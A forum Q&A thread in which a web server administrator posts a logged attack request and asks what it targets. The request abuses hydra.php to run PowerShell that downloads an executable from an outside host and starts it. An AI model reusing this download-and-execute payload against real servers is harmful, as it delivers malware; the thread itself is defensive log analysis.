trojan81
asked on
powershell exploit attempt
I've noticed that all of my web servers were logging this block below from my host intrusion prevention system. For privacy, assume this particular webserver has a dns name of zeus.xyzcorp.com
zeus.xyzcorp.com/public/hy dra.php?xc md=cmd.exe %20/c%20po wershell%2 0(new-obje ct%20Syste m.Net.WebC lient).Dow nloadFile( 'http://a46.bulehero.in/download.exe','C:/8.exe');start%20C:/8.exe
Is this bot just a crafted URL request being thrown at my webserver in hopes that it is vulnerable to run a powershell script that will make it reach out and download + execute something? Which exploit would this be targetting?
zeus.xyzcorp.com/public/hy
Is this bot just a crafted URL request being thrown at my webserver in hopes that it is vulnerable to run a powershell script that will make it reach out and download + execute something? Which exploit would this be targetting?
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Whatever it is doing, my webserver is no vulnerable so it didn't execute anything. I'm curious which vulnerability it is targetting.
Same 404 :)
EXPERT CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Jose/Qlemo,
Would you say that it is trying to invoke powershell to download and run the file?
Would you say that it is trying to invoke powershell to download and run the file?
Yes. but that would require to run PHP code in hydra.php located on your web site's public folder. Maybe a reference to http://www.markus-lanthaler.com/hydra/, and the crafted (cheap) attack based on that API?
ASKER
public/hydra.php?xcmd=cmd.